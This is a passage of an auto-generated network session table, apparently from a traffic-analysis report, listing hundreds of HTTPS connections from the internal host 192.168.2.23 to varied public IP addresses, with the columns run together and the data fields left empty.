                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15485192.168.2.2349996122.123.105.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15486192.168.2.2358344134.147.75.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15487192.168.2.23541145.29.209.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15488192.168.2.235638619.180.195.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15489192.168.2.2356980169.210.109.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15490192.168.2.2354872166.151.104.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15491192.168.2.2345434106.88.153.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15492192.168.2.2333036107.34.25.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15493192.168.2.2339986173.90.15.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15494192.168.2.2340090136.225.219.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15495192.168.2.235444288.146.26.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15496192.168.2.2336224130.131.61.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15497192.168.2.234875242.245.150.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15498192.168.2.23586028.150.85.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15499192.168.2.234369414.23.48.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15500192.168.2.2337684118.128.50.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15501192.168.2.2343392138.107.61.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15502192.168.2.235804658.249.255.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15503192.168.2.2345158136.33.135.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15504192.168.2.236094665.69.93.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15505192.168.2.2338290122.59.18.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15506192.168.2.23396282.28.39.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15507192.168.2.2356296151.117.16.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15508192.168.2.235340813.228.102.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15509192.168.2.2337942125.188.161.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15510192.168.2.23554182.41.7.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15511192.168.2.233796639.77.245.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15512192.168.2.2332786145.165.240.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15513192.168.2.234613873.7.95.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15514192.168.2.2336084140.154.138.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15515192.168.2.2348534177.1.94.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15516192.168.2.2354106108.55.23.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15517192.168.2.235457050.188.88.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15518192.168.2.2346866153.251.124.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15519192.168.2.233298819.125.120.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15520192.168.2.2346758158.116.129.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15521192.168.2.2352764222.58.45.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15522192.168.2.233429892.38.170.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15523192.168.2.2355860109.32.29.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15524192.168.2.235514481.20.172.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15525192.168.2.2359398168.107.134.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15526192.168.2.2332900120.169.184.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15527192.168.2.233855697.169.167.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15528192.168.2.235882245.15.163.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15529192.168.2.2347572166.60.144.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15530192.168.2.235270062.22.160.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15531192.168.2.2351578120.196.69.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15532192.168.2.2355520159.195.114.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15533192.168.2.234477837.167.242.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15534192.168.2.234971824.190.109.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15535192.168.2.2349324180.191.60.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15536192.168.2.2340066137.216.119.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15537192.168.2.2354300102.79.155.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15538192.168.2.2354766109.29.10.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15539192.168.2.23459821.222.220.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15540192.168.2.2349254185.115.14.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15541192.168.2.2346298175.195.211.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15542192.168.2.235067699.20.245.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15543192.168.2.234164473.240.110.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15544192.168.2.233635642.145.42.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15545192.168.2.2339406176.237.79.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15546192.168.2.2336958136.254.85.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15547192.168.2.23415845.170.225.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15548192.168.2.235305097.187.200.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15549192.168.2.235453483.217.178.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15550192.168.2.235854043.206.234.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15551192.168.2.234062482.48.188.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15552192.168.2.2334872155.124.173.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15553192.168.2.234883637.141.247.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15554192.168.2.2352208124.108.202.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15555192.168.2.2338166216.232.208.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15556192.168.2.2337720131.70.162.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15557192.168.2.2345802188.121.12.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15558192.168.2.2348790218.243.204.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15559192.168.2.234498235.163.137.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15560192.168.2.2344822166.42.173.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15561192.168.2.2337188193.204.14.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15562192.168.2.233964879.1.130.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15563192.168.2.234690269.25.182.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15564192.168.2.2339720119.105.27.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15565192.168.2.2349830106.138.53.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15566192.168.2.233692678.90.144.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15567192.168.2.233579646.232.5.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15568192.168.2.2339644165.228.3.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15569192.168.2.2347884199.16.193.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15570192.168.2.2336728222.11.13.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15571192.168.2.233919095.233.90.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15572192.168.2.234096218.14.146.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15573192.168.2.235740831.139.93.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15574192.168.2.2352996184.193.135.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15575192.168.2.233628879.43.38.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15576192.168.2.2346546151.80.121.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15577192.168.2.235315836.234.145.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15578192.168.2.234331254.13.21.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15579192.168.2.233459859.235.0.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15580192.168.2.2351034199.11.251.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15581192.168.2.236093894.178.27.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15582192.168.2.2350380172.0.147.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15583192.168.2.2337902192.214.166.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15584192.168.2.2346972192.196.139.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15585192.168.2.233532483.88.75.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15586192.168.2.2337322205.158.118.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15587192.168.2.235564691.17.208.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15588192.168.2.235755423.254.211.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15589192.168.2.2335926185.179.117.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15590192.168.2.235542481.203.243.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15591192.168.2.2356678144.39.124.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15592192.168.2.233893887.29.218.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15593192.168.2.235507864.81.169.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15594192.168.2.233983638.163.182.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15595192.168.2.2353864151.233.231.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15596192.168.2.234457061.65.171.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15597192.168.2.2357378120.186.45.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15598192.168.2.234271483.153.142.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15599192.168.2.235279452.93.62.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15600192.168.2.2336702189.156.217.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15601192.168.2.233330043.149.154.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15602192.168.2.2344318101.157.91.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15603192.168.2.236021690.173.180.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15604192.168.2.23348761.255.255.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15605192.168.2.235355476.7.206.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15606192.168.2.235816235.42.217.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15607192.168.2.2339640118.235.215.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15608192.168.2.2339562167.222.248.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15609192.168.2.2345616106.74.124.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15610192.168.2.2352398120.160.210.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15611192.168.2.2354940112.61.104.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15612192.168.2.235692475.22.45.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15613192.168.2.2351292159.43.90.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15614192.168.2.2354190175.26.212.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15615192.168.2.233624258.27.141.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15616192.168.2.2352564221.194.253.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15617192.168.2.2360344193.210.56.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15618192.168.2.233322847.161.204.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15619192.168.2.2340786130.17.104.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15620192.168.2.2357926104.162.37.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15621192.168.2.2337514103.218.61.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15622192.168.2.2349664138.104.118.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15623192.168.2.2345908101.228.71.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15624192.168.2.2342586138.153.247.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15625192.168.2.2350406219.181.134.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15626192.168.2.2354286186.218.25.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15627192.168.2.2344968128.167.213.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15628192.168.2.235761237.64.193.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15629192.168.2.234783081.150.237.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15630192.168.2.2337468191.35.250.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15631192.168.2.2347294186.204.47.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15632192.168.2.2333238129.20.255.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15633192.168.2.2342356134.219.136.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15634192.168.2.233877898.57.4.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15635192.168.2.2342464173.211.212.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15636192.168.2.235582432.140.69.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15637192.168.2.2340294194.216.196.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15638192.168.2.2339748201.176.249.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15639192.168.2.2349236105.205.148.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15640192.168.2.2338092182.188.89.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15641192.168.2.235443288.132.136.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15642192.168.2.2347838120.21.147.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15643192.168.2.2342944175.12.231.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15644192.168.2.235326460.66.145.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15645192.168.2.2352934132.50.163.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15646192.168.2.2353484134.152.61.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15647192.168.2.2349128138.65.236.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15648192.168.2.2334066198.192.122.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15649192.168.2.2336956182.11.63.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15650192.168.2.2334028116.198.43.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15651192.168.2.2344446130.92.252.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15652192.168.2.235325877.118.203.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15653192.168.2.235777242.19.216.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15654192.168.2.2346896183.250.148.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15655192.168.2.2351500171.42.45.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15656192.168.2.2345498140.27.12.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15657192.168.2.2349124117.35.153.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15658192.168.2.233836219.136.125.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15659192.168.2.2351234185.192.54.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15660192.168.2.2350782170.225.78.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15661192.168.2.235333840.21.140.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15662192.168.2.2348848180.157.220.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15663192.168.2.2334808124.112.209.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15664192.168.2.233419052.15.85.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15665192.168.2.234480048.227.234.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15666192.168.2.2341226176.237.134.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15667192.168.2.233920243.110.52.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15668192.168.2.2347216148.245.69.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15669192.168.2.2357528182.68.175.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15670192.168.2.2351844222.192.127.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15671192.168.2.233750651.168.218.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15672192.168.2.2355122181.107.180.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15673192.168.2.2354132165.102.17.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15674192.168.2.2339320120.121.75.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15675192.168.2.2338900222.170.104.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15676192.168.2.2353726155.148.50.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15677192.168.2.2345472122.235.17.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15678192.168.2.235231854.127.91.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15679192.168.2.2337378157.3.220.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15680192.168.2.234667290.2.247.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15681192.168.2.2345942180.66.151.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15682192.168.2.2333480140.239.44.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15683192.168.2.234531460.145.239.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15684192.168.2.2341512132.72.13.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15685192.168.2.233661844.138.188.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15686192.168.2.235808084.16.16.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15687192.168.2.2337764155.233.10.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15688192.168.2.2345280124.114.49.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15689192.168.2.235216461.77.166.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15690192.168.2.23486225.164.238.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15691192.168.2.233360044.95.168.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15692192.168.2.235986852.141.89.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15693192.168.2.2347242222.97.140.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15694192.168.2.2355850183.252.166.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15695192.168.2.2342642122.242.136.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15696192.168.2.235769068.73.231.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15697192.168.2.2339984158.218.171.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15698192.168.2.2334078173.90.207.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15699192.168.2.235772283.67.35.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15700192.168.2.2358826191.120.138.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15701192.168.2.2346040221.0.227.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15702192.168.2.234047039.87.144.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15703192.168.2.2352458144.126.197.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15704192.168.2.235976657.143.214.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15705192.168.2.2356822109.255.120.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15706192.168.2.234953863.231.232.77443
